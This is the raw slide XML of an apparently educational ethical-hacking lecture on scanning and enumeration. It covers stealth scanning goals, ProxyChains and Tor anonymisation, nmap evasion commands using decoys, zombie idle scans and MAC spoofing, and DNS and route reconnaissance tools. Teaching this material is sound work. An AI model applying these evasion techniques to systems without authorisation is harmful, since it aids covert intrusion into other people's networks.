            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  to create a password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245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DE87EBC6-C8BE-1C4A-6199-E898AF1C4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AEA19-E674-FB88-75D3-CCFF9A2F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Scanning and Enumeration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CB922-5431-E446-FD5D-567A13CDB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1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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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107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22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F75B-4F43-02DC-9557-8BCFE935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Scanning and Enumeration Activities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5F0EE-F230-AE9A-601F-C14CBC067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FD75C-96B1-7FB0-85C7-9077D05BF481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250302" y="1679510"/>
            <a:ext cx="71099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Checking for any live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Checking for firewalls and their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Checking for open network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Checking for running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Checking for security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Creating a network topology of the target network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F9A8E5F-0F64-5DE9-0EA9-0C362E915E86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1630218" y="3987834"/>
          <a:ext cx="9723582" cy="253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85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AE97-C086-0DCD-9F94-A63504B2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Stealth Scanning Techniques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37FA8-C77B-E035-E499-2F7FBA7D9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DE135-C7EB-670C-C779-71E0D02ADC4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238250" y="1568440"/>
            <a:ext cx="96583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>
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t>Use Cases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>
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t>Camouflage tool signatures to avoid detection and thereby trigger an alarm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>
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t>Hide the attack within legitimate traffic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>
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t>Modify the attack to hide the source and type of traffic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>
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t>Make the attack invisible using non-standard traffic types or encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:latin typeface="CrimsonPro-Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t>Stealth scanning techniques can include some or all of the following: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>
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t> Adjusting source IP stack and tool identification settings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>
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t>Modifying packet parameters (Nmap)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>
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t>Using proxies with anonymity networks (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" baseline="0" err="1">
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t>ProxyChains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:latin typeface="CrimsonPro-Regular"/>
              </a:rPr>
              <a:t> and the Tor network)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2147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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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1C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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How do attackers proceed?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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118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Web Application Security Vulnerabilities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7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506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Network Vulnerabilities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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="443489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Ethical Hacking and Penetration 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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="549628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Useful Tools for PenTesting for Variouses Attack Phases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13255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DF41-0F71-7737-9C84-6650E361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Quick side-step: TOR and Onion Routing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E1B94-6911-15BD-4973-CD5DFBDA7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DBA41-10B4-E5AE-3564-55B78EA3DBAF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81" y="1853229"/>
            <a:ext cx="695483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04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F381-79CC-8979-1F63-918E0615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Tor Data Transfer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2CAA04-25DB-AC4B-D682-51BAEFC85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EEE52-0F5F-8CAC-19EA-436361F6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684966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BEAA0C9-D04A-DD44-3705-CE36080EA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6311106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 u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.torproject.org/svn/trunk/doc/design-paper/tor-design.html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4D632AF-9A51-E70F-0A55-3A3548D4B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930106"/>
            <a:ext cx="662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Alice builds a two-hop circuit and begins fetching a web page.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335451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E2E2-AD8D-3839-8A81-FAB70365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TOR config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8679D-BD2D-B1B4-9234-4220A2914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5C11C-A6F7-39D4-B30B-12BB95F5CD3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001485" y="1611086"/>
            <a:ext cx="85235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err="1"/>
              <a:t>Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> apt install tor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Edit /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/proxychains4.conf file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Add proxies (proxies can be found via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>https://www.proxynova.com/proxy-server-list/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> service tor start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>4. Firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.whatismyip.com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note IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Proxychains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firefox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>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.whatismyip.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>6. Do a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> with the latter IP address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Note that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> and Metasploit may break </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>In tor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E4E74-0999-6096-F8EE-7281B6D8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2" y="3817584"/>
            <a:ext cx="4372914" cy="28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EF80-BB07-5E53-24DD-AF837B2F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Stealth Scanning Advices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F0E81-572B-ACE6-6B05-809465834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A5394-183B-252F-67AD-07C8B86F1C51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1866900"/>
            <a:ext cx="1082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Always deactivate all unnecessary services in KALI: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E.g. DHCP activated but not needed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> DHCP may interact with target system, which may be detected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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Other services: bug reporting, licensing, other comm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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Some tools (e.g. Metasploit) tag their packets  test tools against lab environment before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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>E.g. with Wireshark (attack virtual target, look in Wireshark for the target’s name and inspect packet capture (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>) file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70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3817-CD47-0659-56F0-F50873CA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6B72A-E368-6319-860F-D78615ED5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D0484-C6B5-E055-84BE-24BDB3E20E0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315685" y="1859339"/>
            <a:ext cx="32089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Standard tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nmap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E.g.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nmap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–spoof-mac Cisco –data-length 24 –T paranoid –max-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hostgroup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1 –max-parallelism 10 –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Pn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10.10.10.100/24 –v –n –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oA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output –p T:1-1024 –randomize-hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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B786C-03A7-48B5-BD9F-E623E988B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753" y="20003"/>
            <a:ext cx="7269949" cy="5620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934C4-FAF3-DA68-1BA5-984BCA774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53" y="5520964"/>
            <a:ext cx="7259063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B3D2-B27D-3650-B1FB-C7FF7EC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Scanning with decoys in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nmap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473C6-0F0C-D643-56C3-534B5DAA8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EF3A8-4752-E189-52B4-EA3D5A94FCA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045028" y="2024743"/>
            <a:ext cx="10409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Nmap –n –D Decoy1, decoy2, decoy3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>targetIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Nmap –D RND:10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>targetIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Nmap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>sI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>ZombieIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>targetIP</a:t>
            </a:r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Decoy can be any IP address, RND:10 means random set of IP addresses </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="593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D430-8425-B038-841A-E95FC962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DNS reconnaissance and route mapping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3BE62-B30D-875A-0076-90DD7FD9F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917BE4-1714-B1BD-AC15-2AD90B9BEA2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088571" y="1491343"/>
            <a:ext cx="44849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Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> facebook.com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Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Dmitry –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>winsepo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> out.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.cyberhia.com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comprehensive mapping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Recon-ng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In recon-ng: marketplace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Marketplace install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>modulename</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Modules 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6DF29-9B13-B983-BDEA-E24DDE22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06" y="1346443"/>
            <a:ext cx="6182588" cy="2676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044F5B-ECC3-BD0A-7506-893804146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11" y="4109056"/>
            <a:ext cx="7259063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F985-11E7-BCCC-B5E4-B98C8F29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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Reconaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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9421F-C735-91D1-64E7-61BF3891D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3C3C8-488F-1E61-B148-732A419D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62" y="1346443"/>
            <a:ext cx="10288196" cy="48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8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A51F-BA30-DF65-2290-A19A7367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route to Target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8BD11-23F3-0DB0-EC84-557B085C2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5B80E-E41F-D2C8-C6F9-7E1C3C292DF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1513114"/>
            <a:ext cx="57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507FC-BF99-36E3-B1A5-CA41F8B6DEBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007076" y="1624914"/>
            <a:ext cx="10346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classical: traceroute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>How does traceroute work?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015C4-51D1-DB4B-4ABD-DF5C80A3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88" y="2455911"/>
            <a:ext cx="9757825" cy="40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B419-A839-A7E3-5AAA-775B7ADE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Identifying external network infrastructure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9EE7-BFC5-57E7-8F0D-5B79FE282AB8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Goals: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Identify devices that may confuse (e.g. load balancers) or eliminate (firewalls, packet inspection devices) test results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Identify devices with known vulnerabilities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Identify requirements for continuing stealth scans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Gain understanding of target’s focus on secure architecture and security posture in general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Tools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lbd:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" baseline="0"/>
              <a:t>Uses two DNS and HTTP-based techniques to detect load balancers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nmap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shodan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censys.io, spyze: similar to Shodan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78668-CF53-9139-CFF6-8870BED7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723073"/>
            <a:ext cx="5458968" cy="34118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7E381-1965-9499-D665-45467823E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Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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0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3" y="530199"/>
            <a:ext cx="6535271" cy="5532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5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4"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="113" dirty="0"/>
              <a:t>Securing</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="213" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="64" dirty="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="68" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="123" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="73" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="132" dirty="0"/>
              <a:t>Application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50033" y="1837973"/>
            <a:ext cx="7765100" cy="3182053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99690" marR="340032" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="123000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86"/>
              </a:spcBef>
              <a:buSzPct val="95652"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="299690" algn="l"/>
                <a:tab pos="300266" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3131" spc="74" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="272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74" baseline="1207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3131" spc="142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123" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="272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102" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="272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74" baseline="1207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3131" spc="272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easy,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="272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but</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="272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creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="272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74" baseline="1207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3131" spc="272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secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="142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88" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087" spc="68" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087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spc="50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2087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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>hard</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087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spc="64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2087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spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>tedious.</a:t>
            </a:r>
            <a:endParaRPr sz="2087" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="299690" marR="680065" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="123400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="54"/>
              </a:spcBef>
              <a:buSzPct val="95652"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="299690" algn="l"/>
                <a:tab pos="300266" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3131" spc="102" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Because</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="374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3131" spc="374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3131" spc="374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i="1" spc="-170" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>multi-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" i="1" spc="-162" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tiered</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" i="1" spc="136" baseline="1207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architecture,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="380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security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="374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flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="374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47" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>may </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>appear</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087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spc="59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087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spc="41" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>levels.</a:t>
            </a:r>
            <a:endParaRPr sz="2087" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="299690" marR="79533" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="123000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="59"/>
              </a:spcBef>
              <a:buSzPct val="95652"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="299690" algn="l"/>
                <a:tab pos="300266" algn="l"/>
              </a:tabLst>
            </a:pP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You</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="360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need</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="368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3131" spc="368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secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="368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your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="368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u="sng" baseline="1207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database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,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="368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your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="368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u="sng" baseline="1207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server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,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="368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your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="368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u="sng" spc="81" baseline="1207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application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="81" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087" spc="64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2087" spc="2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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087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u="sng" spc="-9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network</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2087" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="299690" marR="4611" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="123000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="64"/>
              </a:spcBef>
              <a:buSzPct val="95652"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="299690" algn="l"/>
                <a:tab pos="300266" algn="l"/>
              </a:tabLst>
            </a:pP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Result:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="14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3131" spc="279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create</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="286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74" baseline="1207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3131" spc="279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secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="156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123" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="279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94" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="286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94" baseline="1207" dirty="0">
                <a:solidFill>
